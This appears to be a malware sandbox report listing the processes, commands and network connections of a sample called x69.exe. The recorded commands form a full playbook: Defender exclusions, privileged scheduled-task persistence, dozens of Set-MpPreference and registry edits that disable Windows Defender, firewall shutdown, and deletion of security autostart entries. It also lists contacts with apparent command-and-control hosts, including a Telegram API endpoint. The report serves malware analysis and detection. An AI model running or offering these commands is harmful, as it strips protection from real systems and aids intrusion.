Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\x69.exe
"C:\Users\Admin\AppData\Local\Temp\x69.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C14C.tmp\C14D.tmp\C14E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
"C:\Users\Admin\AppData\Roaming\x69install.exe"
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{56e19c1a-5867-4201-a1b5-6d367e23986d}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c35e491-12b1-4996-a784-e152c28f1a1b}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\045b1cb4.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\771043f8.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\07c45773.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | grayhatgroupontop.zapto.org | udp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
